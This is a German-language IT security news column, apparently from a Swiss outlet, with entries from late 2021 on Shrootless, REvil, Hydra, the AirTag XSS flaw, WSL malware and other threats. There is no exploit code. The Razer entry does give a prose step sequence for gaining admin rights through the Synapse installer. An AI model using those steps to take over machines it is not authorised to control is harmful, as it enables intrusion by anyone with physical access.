Die Sicherheitslücke erhielt den Namen "Shrootless" sowie die Bezeichnung CVE-2021-30892. Sie befindet sich im "System Integrity Protection (SIP)"-Feature von MacOS. Eigentlich soll SIP sicherstellen, dass nur von Apple signierte Installationsprogramme oder der firmeneigene Update-Mechanismus Dateien auf Systemebene ändern können. So werden auch Root-Nutzer daran gehindert, Operationen durchzuführen, welche die Systemintegrität gefährden könnten.

"Die Schwachstelle liegt in der Art und Weise, wie von Apple signierte Pakete mit Post-Installationsskripten installiert werden", schreibt Microsoft. Ein böswilliger Akteur könne eine speziell gestaltete Datei erstellen, die den Installationsprozess unterbricht und die SIP-Beschränkungen umgeht. Anschliessend könnte ein Angreifer unter anderem einen bösartigen Kernel-Treiber (Rootkit) installieren, Systemdateien überschreiben oder ein nicht erkennbares, persistentes Schadprogramm installieren.

Selbstverständlich nutzte Microsoft die Chance auch sogleich, um Werbung für die eigenen Produkte zumachen: Mit "Microsoft Defender for Endpoint on Mac" könnten Unternehmen Schwachstellen erkennen und beheben. Anzeichen dafür, dass die Schwachstelle aktiv ausgenutzt wurde, gibt es aktuell keine.

01.11.2021 - 14:14 Uhr

Microsoft hackt Apple: Schwachstelle in MacOS gefunden

Ende Oktober hat Apple eine Schwachstelle in seinem Betriebssystem MacOS behoben. Eine ernste Sicherheitslücke, die es einem Angreifer ermöglichen könnte, beliebige Befehle auszuführen und Root-Rechte zu erlangen. Selber gefunden hatte der kalifornische Hersteller die Schwachstelle allerdings nicht; auch waren es keine unabhängigen IT-Security-Firmen. Nein, ausgerechnet Microsoft machte Apple darauf aufmerksam

Die Sicherheitslücke erhielt den Namen „Shrootless“ sowie die Bezeichnung CVE-2021-30892. Sie befindet sich im „System Integrity Protection (SIP)“-Feature von MacOS. Eigentlich soll SIP sicherstellen, dass nur von Apple signierte Installationsprogramme oder der firmeneigene Update-Mechanismus Dateien auf Systemebene ändern können. So werden auch Root-Nutzer daran gehindert, Operationen durchzuführen, welche die Systemintegrität gefährden könnten.

"Die Schwachstelle liegt in der Art und Weise, wie von Apple signierte Pakete mit Post-Installationsskripten installiert werden", schreibt Microsoft. Ein böswilliger Akteur könne eine speziell gestaltete Datei erstellen, die den Installationsprozess unterbricht und die SIP-Beschränkungen umgeht. Anschliessend könnte ein Angreifer unter anderem einen bösartigen Kernel-Treiber (Rootkit) installieren, Systemdateien überschreiben oder ein nicht erkennbares, persistentes Schadprogramm installieren.

Selbstverständlich nutzte Microsoft die Chance auch sogleich, um Werbung für die eigenen Produkte zumachen: Mit "Microsoft Defender for Endpoint on Mac" könnten Unternehmen Schwachstellen erkennen und beheben. Anzeichen dafür, dass die Schwachstelle aktiv ausgenutzt wurde, gibt es aktuell keine.

25.10.2021 - 15:25 Uhr

Update: Internationale Kooperation bezwingt REvil-Ransomware-Gang

Update vom 25.10.2021: Vor rund einer Woche ist bekannt geworden, dass die cyberkriminelle Gruppierung hinter der REvil-Ransomware sich wohl zurückgezogen hat. Die genauen Hintergründe waren allerdings bislang noch nicht klar. 

Wie "Reuters" nun berichtet, legte eine internationale Kooperation verschiedener Behörden die Gruppe lahm. Namentlich erwähnt werden das FBI, der Secret Service sowie das United States Cyber Command. Laut VMwares Head of Security Strategy Tom Kellermann beteiligten sich auch die Nachrichtendienste und Strafverfolgungsbehörden von „gleichgesinnten Ländern“ weltweit. Kellermann berät den Secret Service bei Cybercrime-Untersuchungen. 

Gemäss dem Bericht erlangten die Behörden Mitte Oktober teilweise Zugriff auf die Server der REvil-Gruppe. Einige Server sollen bereits in ihrer Kontrolle gewesen sein, seitdem die Gruppe das erste Mal untertauchte. 

Bitcoin auf Wanderschaft
Die REvil-Ransomware wird auch mit der Darkside-Ransomware in Verbindung gebracht. So soll die Gruppe etwa hinter der Cyberattacke auf Colonial Pipeline stecken. Für die Attacke wurde die Darkside-Ransomware genutzt. REvil und Darkside nutzen ähnlich aufgebaute Lösegeldforderungen sowie denselben Quellcode. 

Bei Darkside - besser gesagt bei ihren Vermögenswerten - ist aktuell einiges los, wie "The Register" berichtet. Wie das Portal berichtet, sind zurzeit Bitcoin mit einem Wert von etwa 7 Millionen US-Dollar in Bewegung. 

Das Geld, das Darkside gehört, wird gerade von einem Wallet zum nächsten transferiert. Bei jeder Transaktion werden kleine Beträge abgezwackt. Dies mache es schwieriger, die Gelder zu verfolgen und helfe dabei, die Gelder in Fiatwährungen zu wechseln. Kleinere Beträge seien auf diese Weise bereits zu bekannten Bitcoin-Börsen geschickt worden. 

Update zur Meldung vom 18.10.2021: "REvil-Ransomware erneut endgültig lahmgelegt - vielleicht"

18.10.2021 - 12:18 Uhr

REvil-Ransomware erneut endgültig lahmgelegt - vielleicht

Die cyberkriminelle Gruppierung hinter der REvil-Ransomware, auch als Sodinokibi bekannt, ist nicht mehr aktiv. Wieder. Nachdem die Gruppierung mit ihrer Attacke auf den IT-Anbieter Kaseya für Aufsehen gesorgt hatte, verschwand sie am 13. Juli 2021 aus dem Darknet. Die gesamte Infrastruktur ging damals offline.

Im September meldete sich die Ransomware-as-a-Service-Gruppe plötzlich wieder mit einer neuen Angriffswelle zurück. Das öffentliche Gesicht von REvil - eine Person, die in Foren lediglich als "Unknown" auftrat - blieb allerdings verschollen. Die Gruppe, davon ausgehend, dass "Unknown" verstorben sei, machte ohne ihn weiter. Wenn auch nur mit mässigem Erfolg (Lesen Sie dazu etwa den Blogeintrag vom 30.09.2021: "REvil-Kunden revoltieren gegen rücksichtslosen Ransomware-Betreiber"). 

Kaum ein Monat nach der Rückkehr scheint REvil wieder abgetaucht zu sein, wie "Bleepingcomputer" berichtet. Der aktuelle Rückzug wirkt allerdings nicht ganz freiwillig. Ein Mitglied der Gruppe, verkündete auf dem russischsprachigen Hacking-Forum XSS, dass jemand die Domains der Gruppe gekapert habe – inklusive dem Tor-Zahlungsportal und dem Blog, über den gestohlene Daten veröffentlicht wurden. Entdeckt hatte dies Dmitry Smilyanets, Cyberanalyst beim US-amerikanischen Unternehmen Recorded Future. 

 

 

Bald darauf meldete sich dasselbe REvil-Mitglied erneut zu Wort: Die Server seien kompromittiert worden und der Angreifer suche aktiv nach ihm. Der Unbekannte, der die Tor-Services attackierte, eröffnete zugleich die Jagd auf die Mitglieder der REvil-Gruppe. 

Das FBI? Bitdefender? Oder ein Angreifer aus den eigenen Rängen?

Wer hinter der Attacke auf REvils Infrastruktur steckt, ist zum aktuellen Zeitpunkt noch nicht klar. Möglicherweise war es das FBI. Es wird behauptet, dass die US-amerikanische Sicherheitsbehörde seit dem Relaunch der REvil-Server auf diese zugreifen kann. 

Der rumänische Sicherheitsanbieter Bitdefender hatte ebenfalls - zumindest für eine gewisse Zeit - Zugriff auf die Infrastruktur der Cyberkriminellen. Das Unternehmen veröffentlichte im September ein Entschlüsselungstool für die Opfer der Ransomware. Bitdefender arbeitete dafür mit "einem anerkannten Strafverfolgungspartner" zusammen. Laut der "Washington Post" handelt es sich dabei allerdings nicht um das FBI.

Vielleicht steckt aber auch "Unknown" dahinter. Schliesslich ist nicht bekannt, was aus dem einstigen Gesicht der REvil-Gruppe geworden ist. Eventuell versucht er nun, die Ransomware-Operation wieder unter seiner Kontrolle zu bringen. 

So oder so ist dies noch kein Grund zum Jubeln. REvil mag Geschichte sein. Mit aller Wahrscheinlichkeit werden die Drahtzieher aber schlicht eine neue Ransomware unter einem neuen Namen aufsetzen und ihre Machenschaften weiterziehen. 
 

11.10.2021 - 15:50 Uhr

Daten stehlen per Erdnussbutter-Sandwich

Was braucht ein Hacker, um sensible militärische Geheimnisse zu stehlen? Extrem leistungsstarke Rechner? Modifizierte Drohnen für die Exfiltration? Waghalsige Aktionen à la Ethan Hunt von Mission Impossible? Nein! Das geht auch alles viel einfacher. Manchmal braucht man nur ein Erdnussbutter-Sandwich und eine Packung Kaugummi. Eigentlich genügt schon ein halbes Erdnussbutter-Sandwich.

Wie das geht, demonstrierte Jonathan Toebbe, ein Nuklearingenieur des United States Department of the Navy. Im Laufe mehrerer Jahre sammelte er die Baupläne eines atomgetriebenen U-Boots der Virginia-Klasse zusammen. 

Da er nun glaubte, genügend Informationen zusammen zu haben, wollte er diese verkaufen. Also setzte er ein Schreiben auf. Darin heisst es: "Bitte leiten Sie dieses Schreiben an Ihren militärischen Nachrichtendienst weiter. Ich glaube, dass diese Informationen für Ihr Land von grossem Wert sein werden." Hilfreich war auch der Hinweis „Dies ist kein Scherz“, denn es klingt schon so, als wäre es einer, wie “The Register“ berichtet

110'000 US-Dollar für ein Sandwich

Tatsächlich meldete sich ein interessierter Käufer bei Toebbe. Was dieser aber nicht wusste: Dabei handelte es sich nicht um eine ausländische Militärmacht, sondern um das FBI. Die US-amerikanische Sicherheitsbehörde "kaufte" Toebbe schliesslich die geheimen Pläne ab. 

Zusammen mit seiner Frau lud Toebbe die Daten auf eine SD-Karte. Diese versteckte das Ehepaar in einem halben Erdnussbutter-Sandwich, das wiederum in einem toten Briefkasten hinterlegt wurde. Eine zweite SD-Karte wurde später in einer Kaugummipackung auf dieselbe Weise überreicht. Für ihre Mühen erhielten die Toebbes insgesamt 110'000 US-Dollar in der Kryptowährung Monero. 

Lange geniessen konnte das Ehepaar diesen neuen Reichtum nicht. Anfang Oktober wurden Jonathan Toebbe und seine Frau verhaftet und angeklagt. 

11.10.2021 - 15:02 Uhr

Trickbot ist wieder da

Trickbot hat es wieder an die Spitze von Check Points aktueller "Most Wanted Malware"-Liste geschafft. Im September waren in der Schweiz gemäss dem israelischen Cybersecurity-Anbieter etwa 3 Prozent der Unternehmen und Organisationen in der Schweiz betroffen.

Trickbot ist ein äusserst versierter Banking-Trojaner. Mittlerweile ist das modulare Schadprogramm deutlich über die ursprüngliche Programmierung hinausgewachsen. Wie Check Point schreibt, nutzen die Cyberkriminellen hinter dem Schadprogramm den Trojaner nicht nur, um Bankdaten zu stehlen. Sie können damit auch das Netzwerk der Opfer auskundschaften und so anschliessend eine unternehmensweite Ransomware-Attacke starten. 

Zeitgleich mit Trickbots Aufstieg sind die Verantwortlichen dafür im Fadenkreuz der Ermittlungsbehörden. So wurde etwa ein Mitglied der Trickbot-Gruppierung in den USA verhaftet. „Wir sind zuversichtlich, dass die Vorherrschaft dieser Bande bald gebrochen wird“, schreibt das Unternehmen.

Check Points vollständige "Most Wanted Malware"-Liste für die Schweiz im September:

  1. Trickbot (Banking-Trojaner): 3,13 Prozent der Schweizer und 4,09 Prozent der globalen Firmen betroffen.
  2. Formbook (Infostealer): 2,54 Prozent der Schweizer und 3,14 Prozent der globalen Firmen betroffen.
  3. AgentTesla (RAT): 1,94 Prozent der Schweizer und 2,59 Prozent der globalen Firmen betroffen.
  4. Dridex (Banking-Trojaner): 1,64 Prozent der Schweizer und 0,75Prozent der globalen Firmen betroffen.
  5. Remcos (Banking-Trojaner): 0,90 Prozent der Schweizer und 2,20 Prozent der globalen Firmen betroffen.
  6. Valyria (Backdoor): 0,90 Prozent der Schweizer und 0,46 Prozent der globalen Firmen betroffen.
  7. Darkside (Ransomware-as-a-Servic): 0,75 Prozent der Schweizer und 0,57 Prozent der globalen Firmen betroffen.
  8. Groooboor (Trojaner): 0,75 Prozent der Schweizer und 0,46 Prozent der globalen Firmen betroffen.
  9. Jorik (Backdoor): 0,75 Prozent der Schweizer und 0,22 Prozent der globalen Firmen betroffen.
  10. Glupteba (Backdoor): 0,75 Prozent der Schweizer und 2,41 Prozent der globalen Firmen betroffen.

04.10.2021 - 14:21 Uhr

Angriffige angepasste Airtags veräppeln arme altruistische Apple-Kunden

Im April hat der US-amerikanische Hersteller Apple die sogenannten Airtags lanciert. Mit diesen sollen Apple-Kundinnen und -Kunden ihre verlorenen Gegenstände wiederfinden können. 

Das System funktioniert recht einfach: Man hängt den NFC-Tracker an einen Gegenstand und wenn dieser verloren geht, aktiviert man den Lost Mode. Scannt eine andere Person einen Airtag im Loste Mode, liefert dieser als Antwort eine URL. Über die URL können die Person, die den Airtag gefunden, und die Person, die den Airtag verloren hat, zueinander finden. 

Mit den Airtags von Apple sollen Kunden und Kundinnen verlorene Gegenstände wiederfinden können.

Mit den Airtags von Apple sollen Kunden und Kundinnen verlorene Gegenstände wiederfinden können. (Source: Apple)

Vielleicht sollten Apple-Kunden es sich aber genau überlegen, bevor sie einen vermeintlich verloren gegangenen Airtag scannen. Der IT-Sicherheitsexperte Bobby Rauch entdeckte nämlich eine bislang nicht behobene Schwachstelle in dem System, wie The Register berichtet.

Ein Angreifer kann so über einen manipulierten Airtag die Person angreifen, die diesen findet. Für die Attacke manipuliert der Angreifer das Kontaktformular. In dem Feld, in dem man eigentlich die Telefonnummer angeben sollte, fügt er ein bösartiges Skript ein. Dieser XSS-Angriff öffnet dem Hacker die Tür für weitere Attacken, etwa Token-Hijacking oder Clickjacking. Das heisst der Angreifer kann etwa die ein- und ausgehende Datenkommunikation des Handys abgreifen oder Klicks umlenken. 

Ein teurer Spass - auch ohne Hermès

Die Wahrscheinlichkeit eines derartigen Angriffs ist wohl nicht sehr hoch, wie es in dem Bericht heisst. Ein Angreifer müsste mehrere Tags manipulieren und blind streuen – in der Hoffnung, dass irgendwer den Tracker findet und scannt. Das macht sich schnell im Portemonnaie bemerkbar. Schliesslich kosten die Airtags knapp 120 Franken im Viererpack – und das ist ohne die passende Hermès-Hülle für 349 Franken

Das passende Zubehör von Hermès für die Airtags von Apple.

Das passende Zubehör von Hermès für die Airtags von Apple. (Source: Apple)

Der eigentliche Schaden, wie The Register schreibt, besteht aber vielmehr darin, dass man nicht mehr ohne Zweifel einen Airtag scannen kann. Und wenn man einen gefundenen Airtag nicht mehr einscannt, beeinträchtigt dies den Nutzen des ganzen Systems.

Und was macht Apple deswegen? Weder äusserte sich das Unternehmen öffentlich zu der Sicherheitslücke, noch scheint es das Problem besonders ernst zu nehmen, wie The Register schreibt. 

Rauch habe Apple die Schwachstelle vor drei Monaten gemeldet. Das Unternehmen hätte zwar versprochen, das Problem zu beheben, aber nichts in der Richtung unternommen, sagte Rauch gegenüber dem Cybersecurity-Journalisten Brian Krebs. Zudem weigerte sich Apple zu bestätigen, ob eine Bezahlung im Rahmen von Apples Bug-Bounty-Programm in Frage kommt oder nicht. Also entschied Rauch sich dazu, die Schwachstelle selbst zu veröffentlichen. 

04.10.2021 - 14:05 Uhr

Banking-Trojaner Hydra infiltriert Commerzbank-Kunden

Wenn Hydra nicht die Shield-Organisation in den Marvel-Filmen infiltriert, untergräbt sie offenbar die App der deutschen Commerzbank. Das Malwarehunterteam entdeckte eine neue Distribution des Banking-Trojaners Hydra. Diese adressiere spezifisch Kunden der Commerzbank. Verbreitet wird der Schädling über SMS, Social Media und auf Foren.

 

 

Der Schädling tarnt sich als eine Android-APK namens "Commerzbank Security" - und nutzt dasselbe Icon wie die offizielle App. Der US-amerikanischen Cybersecurity-Anbieter Cyble schaute genauer hin und entdeckte, dass der Banking Trojaner weitreichende Berechtigungen auf dem Smartphone erlangen kann. Hat die Malware das Handy infiziert, ist es also bereits zu spät. 

So kann die schädliche App etwa sicherstellen, dass sie stets im Hintergrund läuft und alle Aktivitäten auf dem Handy überwacht. Ferner gewährt sich der Trojaner Admin-Rechte. Hydra kann unter anderem SMS lesen und verschicken, Systembenachrichtigungen anzeigen, Systemeinstellungen ändern, Anrufe tätigen und auch weitere Apps installieren. Für keine dieser Handlungen braucht Hydra eine Einwilligung oder auch nur eine Bestätigung des Opfers. 

Jagd nach Passwörtern

Mit diesen Berechtigungen kreiert der Schädling Overlays auf anderen Apps. So kann das Schadprogramm PIN, Passwörter und auch einmalige Kennwörter - etwa für eine Multi-Faktor-Authentifizierung - stehlen. Die Kommunikation mit dem Kontrollserver geschieht über verschlüsselte TOR-Kanäle. Um die Verbreitung der Malware anzukurbeln, versendet sie SMS an alle Kontakte auf dem infizierten Gerät. 

Neu an dieser Variante von Hydra ist eine Integration von Teamviewer. Auf diese Weise kann das Schadprogramm den Bildschirm des infizierten Geräts an die Angreifer senden. Wer die falsche Commerzbank-App auf dem Handy hat, sollte sein Gerät mit einem vertrauenswürdigen Security-Tool säubern und anschliessend komplett neu aufsetzen. 

Die Commerzbank gehört zu den fünf grössten Finanzinstituten Deutschlands. Ihre rund 49'000 Mitarbeitenden bedienen gemäss Statista etwa 18 Millionen Kunden - vor allem in Deutschland und Zentraleuropa. 

Bis Ende Jahr will die Bank in der Schweiz jedoch ihre Regionalbüros in St. Gallen, Basel, Bern, Lausanne und Luzern schliessen, wie das St. Galler Tagblatt berichtete (Paywall). Künftig wolle man sich auf die Zentrale in Zürich konzentrieren und Firmenkunden verstärkt digital beraten.

30.09.2021 - 17:10 Uhr

REvil-Kunden revoltieren gegen rücksichtslosen Ransomware-Betreiber 

Die cyberkriminelle REvil-Gruppierung bietet ihre Ransomware As-a-Service an. Am Ende des Tages funktioniert dies nicht anders als bei einer herkömmlichen, legalen Software. Andere Cyberkriminelle erwerben Lizenzen, infizieren Opfer, erpressen diese und geben REvil einen ordentlichen Teil des Lösegeldes. Um das Produkt möglichst erfolgreich in die Welt hinaus zu tragen, setzten Ransomware-Anbieter oftmals auf ein Partnerprogramm und einen Kundendienst. 

Bei REvil funktioniert allerdings beides zurzeit nicht so erfolgreich. Wie der US-amerikanische Cybersecurity-Anbieter Flashpoint schreibt, häufen sich zurzeit die Beschwerden. Cyberkriminelle, welche die REvil-Ransomware für ihre Machenschaften nutzen, fühlen sich ausgenutzt. 

In einem Forum beschwert sich etwa ein Nutzer, dass die REvil-Entwickler eine Hintertür in ihre Ransomware eingebaut haben. Dank der Backdoor könnte die REvil-Gruppe ihre Partner die ganze harte Arbeit machen lassen - also die Opfer infizieren - und anschliessend die Kommunikation zwischen den Opfern und den Partnern komplett übernehmen. So behält die Gruppe auch das gesamte Lösegeld für sich. 

Weitere Beschwerden betreffen das "lausige Partnerprogramm" sowie das Verhalten der REvil-Gruppe. Angeblich seien jegliche Versuche, mit der Bande zu verhandeln, vergeblich. Keine Ehre unter Dieben also; wer nicht aufpasst, kriegt eine verpasst. 

Übrigens: Bitdefender hat im September ein Entschlüsselungstool für die REvil-Ransomware veröffentlicht. Diese hilft bei allen Attacken, die vor dem 13. Juli ausgeübt wurden. Lesen Sie hier mehr dazu. Und wenn Sie mehr zu den Marketing-Massnahmen von Cyberkriminellen wissen möchten, finden Sie das hier.

20.09.2021 - 15:51 Uhr

Nicht mehr nur theoretisch: Jetzt gibt es Linux-Malware für Windows

Vor vier Jahren hat der israelische Cybersecurity-Anbieter Check Point vor einem neuen Angriffsvektor gewarnt. Der Machbarkeitsnachweis zeigte einen neuen Weg, auf dem Cyberkriminelle einen Rechner infizieren könnten. 

Damals, im September 2017, wurde diese Angriffsmethode verharmlost. Bashware, wie die zu dem Zeitpunkt lediglich theoretische Methode genannt wurde, sei zu komplex, um zu einer tatsächlichen Bedrohung zu werden. Ausserdem setze sie ein Feature voraus, das standardmässig deaktiviert ist. 

Wie Cybersecurity-Experten von Black Lotus Labs entdeckten, wird die Methode nun trotzdem von Cyberkriminellen genutzt. Black Lotus Labs ist die IT-Sicherheitsabteilung des US-amerikanischen Telkos Lumen Technologies.

Über Linux zu Windows

Bei diesen Attacken nutzen die Angreifer im Wesentlichen Linux-Malware auf einem Windows-System. Konkret verwendet die Methode das Windows-Subsystem für Linux – kurz WSL. Die Kompatibilitätsschicht ermöglicht die Ausführung von ausführbaren Linux-Dateien in Windows 10.

Black Lotus Labs entdeckte nach eigenen Angaben mehrere schädliche Python-Files, die im Binärformat ELF (Executable and Linkable Format) für Debian Linux kompiliert wurden. Diese Dateien funktionieren als Loader. 

Wird der Code ausgeführt, ruft er verschiedene Windows-APIs auf, um auf eine Remote-Datei zuzugreifen und diese einem laufenden Prozess hinzuzufügen. So erhalten die Cyberkriminellen Zugriff auf den infizierten Rechner. Allerdings müssten die Angreifer wohl zunächst schon über gewisse Rechte innerhalb der WSL-Umgebung verfügen. 

Sehr geringe Detektionsrate

Der Schädling kann auch Powershell-Skripte ausführen. Auf diese Weise versucht er unter anderem, Antivirenlösungen zu deaktivieren.

Die entdeckten Angriffsversuche seien allerdings nicht sonderlich fortgeschritten gewesen. Zum Glück. Denn als Black Lotus Labs den Schädling mit der Onlinedatenbank Virus Total prüfte, identifizierte kaum einer der gängigen Antiviren-Suchengines die Datei als schädlich.

Black Lotus Labs rät allen, die WSL nutzen, zu überprüfen, ob die Logging-Funktion aktiv ist. So könne man derartige Eindringlinge aufspüren. 

Mehr Details zu der Angriffsmethode finden Sie im Blogbeitrag von Black Lotus Labs.

 

06.09.2021 - 13:13 Uhr

Hacker nutzen Windows-11-Hype schon vor dessen Veröffentlichung aus

Windows ist zurzeit in den letzten Zügen vor der Veröffentlichung seines neuen Betriebssystems Windows 11. Anfang Oktober soll es der Öffentlichkeit zur Verfügung stehen – sofern die genutzten Rechner die Systemanforderungen erfüllen. Lesen Sie hier mehr dazu.

Dass das neue OS noch nicht erschienen ist, hält Cyberkriminelle aber nicht davon ab, den Hype darum schon auszunutzen. Wie der US-amerikanische Cybersecurity-Anbieter Anomali mitteilt, kursieren zurzeit Phishing-Mails, die auf Windows 11 anspielen. 

Die Masche ist alt und vor allem altbewährt; neu ist lediglich der Hinweis auf das neue OS. Die Cyberkriminellen verschicken Word-Dokumente per E-Mail. Wer das Dokument öffnet, sieht Bilder und Texte, die dem Opfer vorgaukeln, das Dokument sei mit "Windows 11 Alpha" erstellt worden. 

Bei dem Opfer soll nun der Eindruck entstehen, dass es daher Kompatibilitätsprobleme gibt und dass man die Makros aktivieren soll, um den Text lesen zu können. Aktiviert das Opfer diese, wird aber eine Javascript-Backdoor heruntergeladen. Über dieses könnten die Cyberkriminellen anschliessend beliebige Schadprogramme auf den Rechner schmuggeln.

Kein Russisch, keine VMs und keine Speicherhungrigen PCs

Bevor die schädlichen Makros zuschlagen, prüfen sie das System allerdings noch auf gewisse Faktoren. Ist das System auf Estnisch, Moldauisch, Russisch, Serbisch, Slowakisch, Slowenisch, Sorbisch oder Ukrainisch eingestellt? Wurde das Dokument in einer VM geöffnet? Ist weniger als 4 Gigabyte an Speicher verfügbar? Falls einer der geprüften Faktoren zutrifft, wird die Infektion gestoppt. Der Schädling sucht zudem nach Hinweisen auf den POS-Anbieter Clearmind. 

Für Anomali ist dieses Vorgehen ein Hinweis auf die Identität der Angreifer. Demnach soll die cyberkriminelle Gruppierung FIN7 (auch bekannt als Carbanak oder Navigator) dahinter stecken. Die Gruppe ist darauf spezialisiert, Kreditkartendaten zu stehlen. Allein in den USA soll die Gruppierung über 1 Milliarde US-Dollar an Schaden verursacht haben. Dafür stahlen die Hacker über 20 Millionen Datensätze von mehr als 6500 Kassenterminals in rund 3600 verschiedenen Verkaufsstellen. 

Die verwendete Backdoor deutet ebenfalls in diese Richtung. Dabei scheine es sich um eine Variante eines Schädlings zu handeln, den die FIN7-Gruppierung seit 2018 nutze. Anomali räumt dennoch ein, dass sie selbst dieser Zuordnung – aufgrund der aktuellen Beweislage – nur mässig vertrauen. 

 

30.08.2021 - 16:44 Uhr

Razer-Mäuse und andere Peripheriegeräte höhlen Microsofts IT-Abwehr aus

Was braucht man, um einen Windows-10-Rechner zu hacken? Nur eine Maus! Was wie der Anfang eines IT-Witzes klingt, ist leider tatsächlich so. Dies verkündete jedenfalls ein IT-Security-Experte, der sich selbst Jonh4t nennt, auf Twitter. Der Tweet ging daraufhin rasch viral, wie unter anderem Forbes berichtet. 

Im Gespräch mit dem Wirtschaftsmagazin erklärte der ethische Hacker das Problem. Schliesst man eine Razer-Maus oder einen entsprechenden Dongle an einen Windows-PC an, kann der Nutzer oder die Nutzerin mit wenigen Klicks volle Admin-Rechte erlangen und beliebig auf Dateien zugreifen oder Malware installieren – auch wenn man den Rechner über einen Gast-Zugang nutzt. 

Diese sogenannte Privilege-Escalation-Schwachstelle beginnt mit der Installation der Synapse-Treibersoftware, die automatisch startet. Im Explorerfenster, das sich sogleich öffnet, kann man mittels der rechten Umschalttaste den Treiberspeicherort auswählen und eine Powershell mit vollständigen System- oder Admin-Rechten öffnen. Der Angreifer kann zudem Persistenz erlangen, indem er eine Service-Binary-Datei speichert, die ausgeführt wird, noch bevor man sich beim Startvorgang an dem Rechner anmeldet. 

Nicht nur Razer-Mäuse sind betroffen

Wie andere Sicherheitsforschende seitdem demonstrierten, betrifft das Problem nicht nur Razer-Peripheriegeräte. Lawrence Amer etwa demonstrierte, wie man die Sicherheitslücke mit einem Gaming-Keyboard von Steelseries ausnutzt. 

Gemäss Forbes machte John4t die Schwachstelle publik, nachdem er keine Reaktion von Razer auf seinen Fund erhalten habe. Nachdem der Tweet viral ging, bestätigte der Hersteller das Problem gegenüber dem ethischen Hacker, gab an, dass an einer Lösung gearbeitet werde und bot ihm ferner noch eine Belohnung an. Eine eher grosszügige Belohnung gemäss dem ethischen Hacker. 

Die potenzielle Gefahr, die von der Sicherheitslücke ausgeht, muss allerdings auch ein wenig relativiert werden. Um diese Schwachstelle auszunutzen, muss der Angreifer physischen Zugriff zum Rechner haben. Ist dies der Fall, kann sich der Angreifer aber mit aller Wahrscheinlichkeit so oder so am PC vergreifen - auch wenn diese Lücke geschlossen wird. Darum sollte man sich immer gründlich überlegen, wen man an den eigenen Rechner lässt und wen nicht. 

23.08.2021 - 12:50 Uhr

Neun Gesichter, um (fast) alles zu entschlüsseln

Filme und Serien wollen oft den Eindruck erwecken, dass biometrische Authentifizierungssysteme die Zukunft sind. Die Realität sieht in der Regel sehr anders aus. Das jüngste Beispiel kommt von der Blavatnik School of Computer Science in Tel Aviv. Die Forschenden aus Israel zerpflückten Gesichtserkennungssysteme. 

Das Team zeigte auf, wie verwundbar derartige biometrische Systeme sind, wie Heise berichtet. Statt das System zu hacken und die gespeicherten zugelassenen Gesichter zu identifizieren, gingen die Forschenden einen anderen Weg: Sie reduzierten ein Gesicht auf die am meisten verallgemeinerten Gesichtsmerkmale, die einem Authentifizierungssystem genügen.

Für ihren Versuch nutzten sie die Datenbank "Labeled Faces in the Wild" (LFW) der University of Massachusetts. Das Open-Source-Archiv mit über 13'000 Bildern wird genutzt, um Gesichtserkennungssysteme zu entwickeln. Mithilfe eines Adversarial Networks namens StyleGAN erschuf das Team sozusagen einen Generalschlüssel. Ein Gesicht, das für 20 Prozent der gespeicherten Personen gehalten werden kann. 

Nach einigen Wiederholungen und Verfeinerungen kamen die Forschenden schliesslich auf neun Gesichter, die 42 bis 64 Prozent der Datenbank abdeckten. Das heisst, dass die Forschenden, wenn ein Zutrittssystem eines der LFW-Gesichter gespeichert hat, in fast zwei Drittel der Fälle dieses System austricksen könnten - und dafür nur neun Login-Versuche benötigen. 

Die Ergebnisse des Blavatnik-Teams warten noch auf eine Prüfung durch andere Experten. Die Resultate passen aber zu bisherigen Forschungsergebnissen bezüglich biometrischen Verifizierungen. So demonstrierten etwa die Sicherheitsexperten John Seymour und Azeem Aqil bereits 2018, wie synthetisch erzeugte Stimmen Apples Siri und auch Azure Speaker Recognition von Microsoft überlisten können (Mehr dazu im Blogeintrag vom 17. August 2018: "Science-Fiction lügt - wieder mal"). Und 2017 zeigte der Chaos Computer Club bereits, wie sich der Iris-Scanner eines Samsung Galaxy S8 mit einer Attrappe täuschen lässt. 

16.08.2021 - 15:25 Uhr

Berüchtigter, totgeglaubter Darknet-Markt Alphabay ist wiederauferstanden

2014 hat der Schwarzmarkt Alphabay im Darknet das Licht der Welt erblickt. Schnell wurde der Markt zu einem der grössten seiner Art. In seinen besten Jahren bediente der Markt über 200'000 Nutzende und 40'000 Händler und Händlerinnen, wie "Bleepingcomputer" berichtet. Man schätzt, dass auf Alphabay mit Drogen, gestohlenen und gefälschten Dokumenten, Malware, Hacking-Tools, Waffen sowie Betrugsdienstleistungen mindestens eine Milliarde US-Dollar erwirtschaftet wurden. 

Am 5. Juli 2017 kamen die illegalen Geschäfte auf dem Markt jedoch zu einem jähen Ende. In Thailand legten die Behörden Alphabay lahm. Zugleich verhafteten sie auch den Administrator Alexander Cazes alias Alpha02. 

Der Kanadier war jedoch nur einer von zwei Administratoren des Schwarzmarktportals - den zweiten konnte die Polizei nicht finden. Nun meldet er sich zurück. DeSnake, wie er sich nennt, hat den Markt am Wochenende vom 14. August wieder hochgefahren: Alphabay ist zurück und bereit für neue dubiose Geschäfte. Besser und sicherer als zuvor, verspricht DeSnake.

Mit der Wiederauferstehung kamen neue Regeln. So darf etwa folgendes auf dem neuen Alphabay nicht angeboten oder diskutiert werden:

  • Auftragsmorde
  • Waffen
  • Pornographische Inhalte (ausser Logins für bekannte Seiten)
  • Fentanyl oder mit Fentanyl versetzte Substanzen
  • Covid-19-Impfungen
  • Doxing (das Zusammentragen und Veröffentlichen von personenbezogenen Daten einer bestimmten Person)

Ferner verbietet DeSnake jegliche Aktivitäten mit Bezug zu Russland, Belarus, Kasachstan, Armenien oder Kirgisistan sowie den Handel mit personenbezogenen Daten aus diesen Ländern. Wie "Flashpoint" schreibt, ist so eine Regel typisch für Marktplätze, welche in diesen Regionen aktiv sind. Neu akzeptiert Alphabay zudem nur noch die Kryptowährung Monero.

DeSnake will aber mehr als nur seinen Markt wieder aufleben lassen. Wie er in einem Statement erklärt, ist es sein Ziel, eine automatisierte Plattform zu entwickeln. Diese Plattform soll es irgendwann jeder Person ermöglichen, einen anonymen und dezentralen Marktplatz zu errichten.
 

09.08.2021 - 14:32 Uhr

Scammer verbannen Instagrammer auch as-a-Service

Verschiedene Scammer drohen damit, beliebige Instagram-Accounts sperren zu lassen. Dabei nutzen sie einen Melde-Mechanismus aus, der Instagram-Nutzende eigentlich vor problematischen Inhalten oder Identitätsdiebstahl schützen soll. 

